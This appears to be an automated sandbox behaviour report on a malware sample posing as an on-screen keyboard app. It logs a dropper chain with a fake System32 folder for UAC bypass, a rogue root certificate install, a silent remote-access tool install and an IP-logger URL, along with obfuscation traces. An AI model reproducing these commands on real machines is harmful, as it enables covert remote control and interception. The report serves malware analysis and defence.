Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://iplogger.org/1tsTg7	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\servs.exe 'C:\Users\user\AppData\Local\Temp\servs.exe'	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe 'C:\Users\user\AppData\Local\Temp\ssevs.exe'	Jump to behavior
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe 'C:\Users\user\AppData\Local\Temp\sssevs.exe'	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6732 CREDAT:82946 /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Process created: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp 'C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp' /SL5='$104D8,10541093,724480,C:\Users\user\AppData\Local\Temp\servs.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /C ''C:\ProgramData\uacwev.bat''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe C:\Windows \System32\PasswordOnWakeSettingFlyout.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe TIMEOUT /T 8
Source: C:\Users\user\AppData\Local\Temp\ssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\ssevs.exe {path}
Source: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe	Process created: C:\ProgramData\pass.exe C:\ProgramData\pass.exe
Source: C:\Users\user\AppData\Local\Temp\sssevs.exe	Process created: C:\Users\user\AppData\Local\Temp\sssevs.exe {path}
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\regedit.exe regedit /s C:\ProgramData\Immunity\ses.reg
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe certmgr.exe -add -c Sert.cer -s -r localMachine Root
Source: C:\Windows\System32\cmd.exe	Process created: C:\ProgramData\Immunity\rutserv.exe 'rutserv.exe' /silentinstall
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\1wOdXavtlE.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 1wOdXavtlE.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 1wOdXavtlE.exe

Static file information: File size 1285632 > 1048576

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: 1wOdXavtlE.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: PasswordOnWakeSettingFlyout.pdb source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp
Source:	Binary string: PasswordOnWakeSettingFlyout.pdbGCTL source: PasswordOnWakeSettingFlyout.exe, 00000017.00000000.454943243.00007FF7D9F57000.00000002.00020000.sdmp

Data Obfuscation:

.NET source code contains method to dynamically call methods (often used by packers)

Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	.Net Code: stackVariable6.GetMethod("GetDelegateForFunctionPointer", V_0)

.NET source code contains potential unpacker

Source: 1wOdXavtlE.exe, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/FrmMain.cs	.Net Code: O1a3HWzTarhibeZ0dp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

PE file contains an invalid checksum

Source: is-PFD3D.tmp.19.dr	Static PE information: real checksum: 0xc2cd should be: 0x193fb
Source: 1wOdXavtlE.exe	Static PE information: real checksum: 0x0 should be: 0x13dc3c
Source: servs.tmp.17.dr	Static PE information: real checksum: 0x0 should be: 0x271505
Source: is-R3F67.tmp.19.dr	Static PE information: real checksum: 0x0 should be: 0x9c1fa0

PE file contains sections with non-standard names

Source: servs.tmp.17.dr	Static PE information: section name: .didata
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: .xdata
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /4
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /19
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /31
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /45
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /57
Source: is-PFD3D.tmp.19.dr	Static PE information: section name: /70
Source: is-R3F67.tmp.19.dr	Static PE information: section name: .didata

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_00D4CA14 push esp; retn 0278h	0_2_00D4CA21
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC0400 push ecx; ret	0_2_04DC0415
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Code function: 0_2_04DC65A0 pushfd ; retf	0_2_04DC65A1
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004A7000 push 004A70DEh; ret	17_2_004A70D6
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004A7980 push 004A7A43h; ret	17_2_004A7A3B
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0043007C push ecx; mov dword ptr [esp], eax	17_2_0043007D
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004990DC push ecx; mov dword ptr [esp], edx	17_2_004990DD
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0045608C push ecx; mov dword ptr [esp], ecx	17_2_00456090
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00430094 push ecx; mov dword ptr [esp], eax	17_2_00430095
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00498140 push ecx; mov dword ptr [esp], edx	17_2_00498141
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0045A16C push ecx; mov dword ptr [esp], edx	17_2_0045A16D
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0045410C push 00454162h; ret	17_2_0045415A
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004251C8 push ecx; mov dword ptr [esp], eax	17_2_004251CD
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0041A1D4 push ecx; mov dword ptr [esp], ecx	17_2_0041A1D8
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00459260 push ecx; mov dword ptr [esp], edx	17_2_00459261
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00430214 push ecx; mov dword ptr [esp], eax	17_2_00430215
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00494220 push 004942FFh; ret	17_2_004942F7
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004223E4 push 004224E8h; ret	17_2_004224E0
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00458380 push ecx; mov dword ptr [esp], edx	17_2_00458381
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00458390 push ecx; mov dword ptr [esp], edx	17_2_00458391
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004953AC push ecx; mov dword ptr [esp], edx	17_2_004953AD
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00493450 push ecx; mov dword ptr [esp], edx	17_2_00493453
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00458464 push ecx; mov dword ptr [esp], ecx	17_2_00458468
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00499470 push ecx; mov dword ptr [esp], edx	17_2_00499471
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00457420 push ecx; mov dword ptr [esp], eax	17_2_00457422
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004544AC push ecx; mov dword ptr [esp], edx	17_2_004544AD
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0048D544 push ecx; mov dword ptr [esp], edx	17_2_0048D546
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00429520 push ecx; mov dword ptr [esp], edx	17_2_00429522
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_0045A520 push ecx; mov dword ptr [esp], edx	17_2_0045A521
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_004595B4 push ecx; mov dword ptr [esp], edx	17_2_004595B5
Source: C:\Users\user\AppData\Local\Temp\servs.exe	Code function: 17_2_00498604 push ecx; mov dword ptr [esp], edx	17_2_00498605

Source: initial sample

Static PE information: section name: .text entropy: 7.52934612956

Source: 1wOdXavtlE.exe, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 1wOdXavtlE.exe, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 1wOdXavtlE.exe, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 1wOdXavtlE.exe, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 1wOdXavtlE.exe, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 0.2.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 0.0.1wOdXavtlE.exe.2a0000.0.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'
Source: 2.0.1wOdXavtlE.exe.740000.0.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/MDIParent1.cs	High entropy of concatenated method names: '.ctor', 'vNt7CgRSH', 'DR2cLwXIU', 'N13jpBwYT', 'RaomhDm2k', 'jNezhcR72', 'wXpqyROYQs', 'U0SqqcHVOR', 'cYQqfoiMjO', 'kLXqMZnJi6'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/Keyboard.cs	High entropy of concatenated method names: '.ctor', 'BuildDefaultDefinition', 'AddKey', 'SetGirdSize', 'PerformKeyboardLayout', 'RcxA8dAqw', 'ab4JIDUo2', 'OnResize', 'OnControlAdded', 'OnControlRemoved'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/FrmMain.cs	High entropy of concatenated method names: '.ctor', 'uXtUG19h6', 'Dispose', 'pIFPxDlQQ', 'get_Text', 'set_Text', 'sssss', 'Reverse', 'CCCCCCCCCCCCCCCCCCCCC', 'ylp5PpB0vQAUGTXtgM'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/TableLayoutManager.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'PerformLayout', 'AddCell', 'AddCell', 'AddCell', 'AddCell', 'dNptQxi1tNhhmYmiSPd', 'LRDBrjiWpCkdCVNmC9l'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/KeyboardDialog.cs	High entropy of concatenated method names: '.ctor', 'get_CreateParams', 'get_ShowWithoutActivation', 'rge1xZqWf', 'WndProc', 'OnShown', 'jjVhgGOotxuxIq4wC74', 'zUedSTOqBiO3Q7khuI0', 'rjaFMrONFSJyiD35IxW', 'Wp9Kx7OOftlL7WJniGN'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, OnScreenKeyboard/KeyboardKey.cs	High entropy of concatenated method names: '.ctor', 'get_CurrentStyle', 'set_CurrentStyle', 'get_IsLocked', 'set_IsLocked', 'AddState', 'GetCurrentState', 'OnPaint', 'FLCwUfOlrIYNYqDheAO', 's0NvjSOnWbYyFqkF6l4'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, gqb4IDQUo2N4kw8qSI/I5CV7Kw49bI1cx8dAq.cs	High entropy of concatenated method names: 'Qw3MjvgS6T', 'Qw3MjvgS6T', 'hBproHeDt', 'sCP3EnieV', 'zhoo3VDaE', 'HtcTkoEb9', 'bcXDvv3hr', 'MgChGfa6e', '.ctor', 'drlKDnZ62jvBGdBx9Ui'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, giVtGRJMm6swpwIJSv/gmUBYOAnq1OMDFkDni.cs	High entropy of concatenated method names: 'Ewk4HQXXhlXik', '.ctor', '.cctor', 'z9GXFfoP424yZCTcoaB', 'eLrvVLoypcxDlc9rhRU', 'uEP3RsoYdKMinVrgyeW', 'ScjivhoVG9pWpYXTcR9', 'IlE02sosnGabTVYv4qi', 'VkFWTioDGprN7wlEBSh', 'HmuIUlo5i2wA1tdcKZu'
Source: 2.2.1wOdXavtlE.exe.740000.1.unpack, kAcPJ2X7wUALIuMwgg/iVyVSA2sQXubY7OcVe.cs	High entropy of concatenated method names: '.cctor', 'BoH4HQX9sxd3j', 'jm6fK5wNQi', 'sXKfRjaji2', 'sL2f8Mdjin', 'jhBfdTxy1K', 'xTafCKsDtd', 'Vl6fv4Djmx', 'NXMfI74sLu', 'aZEfxi5U0D'

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows \System32\PasswordOnWakeSettingFlyout.exe

Installs new ROOT certificates

Source: C:\ProgramData\Immunity\CertMgry\CertMgr.Exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5E2169F36E05D5652FF097A43315EECA06FC5927 Blob

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\is-5B1U4.tmp\servs.tmp	File created: C:\Users\user\AppData\Local\Temp\is-QEDPC.tmp\_isetup\_setup64.tmp	Jump to dropped file
